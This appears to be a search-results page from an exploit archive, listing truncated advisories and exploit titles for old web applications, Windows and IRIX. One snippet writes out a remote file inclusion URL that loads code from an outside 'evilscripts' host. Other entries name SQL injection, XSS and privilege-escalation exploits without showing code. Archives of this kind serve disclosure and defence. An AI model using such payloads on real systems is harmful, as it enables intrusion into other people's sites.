779 matches found
TaskTracker <= 1.5 (Customize.asp) Remote Add Administrator Exploit
Exploit for unknown platform in category web applications =================================================================== TaskTracker Publisher option va...
[x0n3-h4ck]Drake CMS v 0.2 XSS exploit
-=--------------------ADVISORY-------------------=- Drake CMS V. 0.2 Author: CorryL x0n3-h4ck.org -=-----------------------------------------------=- -=+ Application: Drake CMS -=+ Version: 0.2 -=+ Vendor's URL: https://sourceforge.net/projects/drakecms/ -=+ Platform: WindowsLinuxUnix -=+ Bug typ...
[Full-disclosure] [x0n3-h4ck.org] Bug on Drake CMS v0.2
-=--------------------ADVISORY-------------------=- Drake CMS V. 0.2 Author: CorryL x0n3-h4ck.org -=----------------------------------------------------=- -=+ Application: Drake CMS -=+ Version: 0.2 -=+ Vendor's URL: https://sourceforge.net/projects/drakecms/ -=+ Platform: WindowsLinuxUnix -=+ Bu...
wsc01.txt
Web Server Creator v0.1 l Remote Include Vulnerability Author: XORON URL: http://www.comscripts.com/jump.php?action=script&id=1082 Class: Remote cont@ct: x0r0nathotmaildotcom Code: include $l; Exploit: http://www.site.com/path/news/include/customize.php?l=http://evilscripts? Greetz: str0ke,...
PHPSimple Choose v0.3
PHPSimple Choose v0.3 Homepage: http://phpsimplechoose.sourceforge.net Description: Do you need to add some fun to your site? Look no further. With PHPSimpleChoose you can let your users input terms and have one randomly choosen. Every bit of text is changeable, and we are working on allowing you...
iFdate v1.2
sorry if youget this twice, the reply page timed out iFdate v1.2 Homepage: http://www.ifusionservices.co.uk/products/productifdate.php Description: Packed full of great features, it supports themes and looks sleek, your users will be able to create & customize their very own profile page, upload...
Blog System v1.2 SQL inj. vuln.
Blog System v1.2 SQL inj. vuln. Vuln. dicovered by : r0t Date: 5 dec. 2005 orginal advisory:http://pridels.blogspot.com/2005/12/blog-system-v12-sql-inj-vuln.html vendor:http://www.netartmedia.net/blogsystem/ affected version:v1.2 and prior Product Description: Blog System allows you to launch and...
phpYellowTM Pro Edition SQL inj. vuln.
phpYellowTM Pro Edition SQL inj. vuln. Vuln. dicovered by : r0t Date: 3 dec. 2005 orginal advisory:http://pridels.blogspot.com/2005/12/phpyellowtm-pro-edition-sql-inj-vuln.html Vendor:http://phpyellow.com/ affected version: phpYellowTM Pro Edition 5.33 and phpYellowTM Lite Edition 5.33 Product...
e107 <= 0.6172 (resetcore.php) Remote SQL Injection Exploit
No description provided by source. ?php 0.27 18/10/2005 ---e017xpl.php e107 0.617 resetcore.php SQL Injection & remote code execution all-in-one by rgod site: http://rgod.altervista.org make these changes in php.ini if you have troubles to launch this script: allowcalltimepassreference = on...
Microsoft Windows Server 2000 - Universal Language Utility Manager (MS04-019)
/ COROMPUTER2004 Crpt Utility Manager exploit v1.666 modified by kralor Crpt It gets system language and sets windows names to work on any win2k :P Feel free to add other languages : You know where we are.. COROMPUTER2004 / / original disclaimer / //by Cesar Cerrudo sqlsecat include struct int id...
Gaim IRC Local Account Information Leakage
When logging into IRC via gaim, gaim registers the user with their valid local account id as well as the nick chosen by the end user. This is revealed when an attacker asks for information regarding the victim. Given that the host name DNS/IP is also registered, an attacker now knows both the...
PeopleSoft <LONGCHAR >and <VARCHAR> Data Upload
Vendor: PeopleSoft Solution ID: 200749181 Product: People Tools Version: 8.42, Others? Platform: Solaris 8, BEA WebLogic, Others? Remote/Local: Remote, Authenticated Title: Character Field Length Impact: Possible denial of service. Description: LONGCHAR and VARCHAR fields allow potentially large...
Some problems in Privatefirewall 3.0
UkR security team presents: Some problems in Privatefirewall 3.0 /////////////////////////////////////////////////////////////////////////////////////////// Product: Privatefirewall version: 3.0 Vendor : Privacyware http://www.privacyware.com Author : UkR-XblP [email protected] - the chief specialist...
msie.5.0.egg.txt
From: "Gibney, Tim" Subject: Not the place but... ...try it anyway. Heh... try this in IE5. Trust me the last part is good : Open up IE5 From the menu, select Tools Internet Options General tab Languages button Press 'Add' Type: "ie-ee" without the quotes and click 'OK' Move "User Defined ie-ee" ...
SGI IRIX 6.5.4 - midikeys Root
source: https://www.securityfocus.com/bid/262/info The setuid root "midikeys" executable can be used to edit arbitrary files via its graphical user interface. This grants malicious users root access to the system. Running the midikeys application, clicking in sounds, and then songs will bring up ...
Security update 1970-01-01
...
Security update 1970-01-01
...
OEM BIOS like NEC
...
Security update 1970-01-01
...